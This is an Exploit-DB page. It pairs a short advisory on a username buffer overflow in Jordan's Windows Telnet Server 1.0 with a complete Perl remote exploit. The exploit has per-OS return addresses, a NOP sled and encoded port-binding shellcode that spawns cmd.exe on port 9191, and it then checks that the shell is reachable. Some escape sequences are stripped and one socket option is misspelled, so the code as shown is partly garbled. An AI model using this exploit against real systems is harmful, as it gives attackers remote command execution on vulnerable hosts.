https://www.exploit-db.com/exploits/23491

漏洞细节尚未披露

source: http://www.securityfocus.com/bid/9316/info

Jordan Windows Telnet Server has been reported prone to a remote buffer overrun vulnerability. The issue has been reported to present itself when a username of excessive length is supplied to the Telnet server. Due to a lack of bounds checking, when this username is copied into an insufficient reserved buffer in stack-based memory, data that exceeds the size of the buffer will overrun its bounds and corrupt adjacent memory. An attacker may exploit this condition to corrupt a saved instruction pointer for the vulnerable function. 

#!/usr/bin/perl

## __________               ___ ___
## ______   __ __  ______/   |   
##  |       _/  |  /  ___/    _    
##  |    |     |  /___ \         /
##  |____|_  /____//____  >___|_  /
##         /           /       /
##
## Jordan's Windows Telnet server version 1.0 remote exploit
## spawn cmd.exe on port 9191
## coded by 1dt.w0lf ... yeap just for fun and drill =)
## this code just C -> Perl port
## based on http://packetstormsecurity.nl/0401-exploits/wts_bo.c by by fiNis > fiNis[at]bk.ru
##
## !!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
##
## Run exploit under command promt (Windows) or shell (*nix)!
## 
## C:>r57jwt.pl 127.0.0.1 23 1
## [~] server : 127.0.0.1
## [~] port   : 23
## [~] target : 1
## [~] connecting to host...
## [+] connected
## [~] sending shellcode
## [+] shellcode sent
## [~] trying to connect on port 9191
## [+] shell spawned on port 9191 ... you are lucky =)
##
## !!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!

use IO::Socket;

if (@ARGV < 3)
{
print "n";
print "Jordan's Windows Telnet server version 1.0 exploitn";
print "usage: $0 <host> <port> <target>n";
print "ntargets:n";
print " 1 - 0x773C4540 - winXP sp0n";
print " 2 - 0x77fb59cc - winXP sp1n";
print " 3 - 0x77e3cb4c - Windows 2000 SP1n";
print " 4 - 0x77e2492b - Windows 2000 SP2n";
print " 5 - 0x77e2afc5 - Windows 2000 SP3n";
print " 6 - 0x77e14c29 - Windows 2000 SP4n";
print " 7 - 0x77f0eac3 - Windows NT sp6n";
print " 8 - 0x7fdabfa9 - Windows 98 SEn";
print " 9 - 0xAAAAAAAA - dosn";
print "n";
exit(1);
}

$server = $ARGV[0];
$port = $ARGV[1];
$target = $ARGV[2];

## targets ##

if($target==1){$ret = 0x773C4540;} # winXP sp0 shell32.dll jmp esp
if($target==2){$ret = 0x77fb59cc;} # winXP sp1
if($target==3){$ret = 0x77e3cb4c;} # Windows 2000 SP1
if($target==4){$ret = 0x77e2492b;} # Windows 2000 SP2
if($target==5){$ret = 0x77e2afc5;} # Windows 2000 SP3
if($target==6){$ret = 0x77e14c29;} # Windows 2000 SP4
if($target==7){$ret = 0x77f0eac3;} # Windows NT sp6
if($target==8){$ret = 0x7fdabfa9;} # Windows 98 SE
if($target==9){$ret = 0xAAAAAAAA;} # dos

print "n";
print "[~] server : $servern";
print "[~] port   : $portn";
print "[~] target : $targetn";
print "n";

$nop_zone="x90x90x90x90x90x90x90x90x90x90x90x90";

## 512 bytes jff code ... little lolz shit
$jff_code="x72x35x37x2Ex62x6Cx61x68x2Ex62x6Cx61x68x2Ex68x61x68x61x5Fx63x6Fx64x65x2Ex6Ax75x73".
          "x74x2Ex66x6Fx72x2Ex66x75x6Ex2Ex2Ex2Ex74x68x69x73x2Ex69x73x2Ex6Ex6Fx74x2Ex6Ex65x65".
          "x64x2Ex66x6Fx72x2Ex67x6Fx6Fx64x2Ex77x6Fx72x6Bx2Ex2Ex2Ex62x75x74x2Ex2Ex2Ex2Ex77x68".
          "x79x2Ex6Ex6Fx74x3Fx2Ex2Ex63x72x65x61x74x65x64x2Ex62x79x2Ex31x64x74x2Ex77x30x6Cx66".
          "x2Ex31x33x2Ex30x31x2Ex32x30x30x34x2Ex66x6Fx72x2Ex6Cx69x74x74x6Cx65x2Ex6Cx61x6Dx65".
          "x2Ex78x70x6Cx6Fx69x74x2Ex2Ex79x65x61x70x2Ex2Ex74x68x69x73x2Ex65x78x70x6Cx6Fx69x74".
          "x2Ex66x6Fx72x2Ex65x64x75x63x61x74x69x6Fx6Ex73x2Ex6Fx6Ex6Cx79x2Ex2Ex2Ex66x75x6Cx6C".
          "x79x2Ex77x6Fx72x6Bx2Ex2Ex2Ex74x65x73x74x65x64x2Ex6Fx6Ex2Ex77x69x6Ex78x70x2Ex2Ex77".
          "x69x74x68x6Fx75x74x2Ex61x6Ex79x2Ex73x65x72x76x69x63x65x2Ex70x61x63x6Bx73x2Ex2Ex63".
          "x61x6Ex2Ex77x6Fx72x6Bx2Ex6Fx6Ex2Ex6Fx74x68x65x72x2Ex76x65x72x73x69x6Fx6Ex73x2Ex6F".
          "x66x2Ex6Dx65x6Cx63x6Fx24x6Fx66x74x2Ex77x69x6Ex64x6Fx77x24x2Ex2Ex62x75x74x2Ex69x27".
          "x6Dx2Ex64x6Fx6Ex27x74x2Ex68x61x76x65x2Ex61x6Ex79x2Ex74x69x6Dx65x2Ex66x6Fx72x2Ex74".
          "x65x73x74x2Ex69x74x2Ex2Ex3Dx28x2Ex2Ex77x65x6Cx6Cx2Ex2Ex2Ex77x65x6Cx6Cx2Ex2Ex2Ex77".
          "x65x6Cx6Cx2Ex2Ex2Ex76x69x73x69x74x2Ex6Fx75x72x2Ex73x69x74x65x3Ax68x74x74x70x3Ax2F".
          "x2Fx72x73x74x2Ex76x6Fx69x64x2Ex72x75x2Ex2Ex6Fx72x2Ex2Ex68x74x74x70x3Ax2Fx2Fx77x77".
          "x77x2Ex72x73x74x65x61x6Dx2Ex72x75x2Ex2Ex2Ex77x65x2Ex67x6Cx61x64x2Ex74x6Fx2Ex73x65".
          "x65x2Ex79x6Fx75x2Ex2Ex2Ex2Ex61x6Ex64x2Ex73x6Fx72x72x79x2Ex66x6Fx72x2Ex6Dx79x2Ex65".
          "x6Ex67x6Cx69x73x68x2Ex2Ex3Dx28x2Ex2Ex2Ex2Ex2Ex2Ex2Ex61x6Ex64x2Ex2Ex2Ex2Ex2Ex48x41".
          "x56x45x2Ex41x2Ex4Ex49x43x45x2Ex44x41x59x2Ex2Ex2Ex2Ex2Ex2Ex2Ex65x6Ex6Ax6Fx79x2E";

## 484 bytes win32 portbind shellcode, spawn cmd.exe on port 9191
$shell_code="xEBx03x5DxEBx05xE8xF8xFFxFFxFFx8BxC5x83xC0x11x33xC9x66xB9xC9x01x80x30x88x40xE2xFA".
"xDDx03x64x03x7Cx09x64x08x88x88x88x60xC4x89x88x88x01xCEx74x77xFEx74xE0x06xC6x86x64x60xD9x89".
"x88x88x01xCEx4ExE0xBBxBAx88x88xE0xFFxFBxBAxD7xDCx77xDEx4Ex01xCEx70x77xFEx74xE0x25x51x8Dx46".
"x60xB8x89x88x88x01xCEx5Ax77xFEx74xE0xFAx76x3Bx9Ex60xA8x89x88x88x01xCEx46x77xFEx74xE0x67x46".
"x68xE8x60x98x89x88x88x01xCEx42x77xFEx70xE0x43x65x74xB3x60x88x89x88x88x01xCEx7Cx77xFEx70xE0".
"x51x81x7Dx25x60x78x88x88x88x01xCEx78x77xFEx70xE0x2Cx92xF8x4Fx60x68x88x88x88x01xCEx64x77xFE".
"x70xE0x2Cx25xA6x61x60x58x88x88x88x01xCEx60x77xFEx70xE0x6DxC1x0ExC1x60x48x88x88x88x01xCEx6A".
"x77xFEx70xE0x6FxF1x4ExF1x60x38x88x88x88x01xCEx5ExBBx77x09x64x7Cx89x88x88xDCxE0x89x89x88x88".
"x77xDEx7CxD8xD8xD8xD8xC8xD8xC8xD8x77xDEx78x03x50xDFxDFxE0x8Ax88xABx6Fx03x44xE2x9ExD9xDBx77".
"xDEx64xDFxDBx77xDEx60xBBx77xDFxD9xDBx77xDEx6Ax03x58x01xCEx36xE0xEBxE5xECx88x01xEEx4Ax0Bx4C".
"x24x05xB4xACxBBx48xBBx41x08x49x9Dx23x6Ax75x4ExCCxACx98xCCx76xCCxACxB5x01xDCxACxC0x01xDCxAC".
"xC4x01xDCxACxD8x05xCCxACx98xDCxD8xD9xD9xD9xC9xD9xC1xD9xD9x77xFEx4AxD9x77xDEx46x03x44xE2x77".
"x77xB9x77xDEx5Ax03x40x77xFEx36x77xDEx5Ex63x16x77xDEx9CxDExECx29xB8x88x88x88x03xC8x84x03xF8".
"x94x25x03xC8x80xD6x4Ax8Cx88xDBxDDxDExDFx03xE4xACx90x03xCDxB4x03xDCx8DxF0x8Bx5Dx03xC2x90x03".
"xD2xA8x8Bx55x6BxBAxC1x03xBCx03x8Bx7DxBBx77x74xBBx48x24xB2x4CxFCx8Fx49x47x85x8Bx70x63x7AxB3".
"xF4xACx9CxFDx69x03xD2xACx8Bx55xEEx03x84xC3x03xD2x94x8Bx55x03x8Cx03x8Bx4Dx63x8AxBBx48x03x5D".
"xD7xD6xD5xD3x4Ax8Cx88";

$pack_ret = pack('l', ($ret));

$buffa .= $jff_code;
$buffa .= $pack_ret;
$buffa .= $nop_zone;
$buffa .= $shell_code;

print "[~] connecting to host...n";

$socket=IO::Socket::INET->new( PeerAddr => $server, PeerPort => $port, Photo => tcp) || die "[-] connect failedn";
print "[+] connectedn";
sleep 1;
print "[~] sending shellcoden";
print $socket "$buffa";
sleep 1;
print "[+] shellcode sentn";
close($socket);

print "[~] trying to connect on port 9191n";
$socket=IO::Socket::INET->new( PeerAddr => $server, PeerPort => "9191", Photo => tcp) || die "[-] damn ... connect to spawn shell failedn";
close($socket);
print "[+] shell spawned on port 9191 ... you are lucky =)n";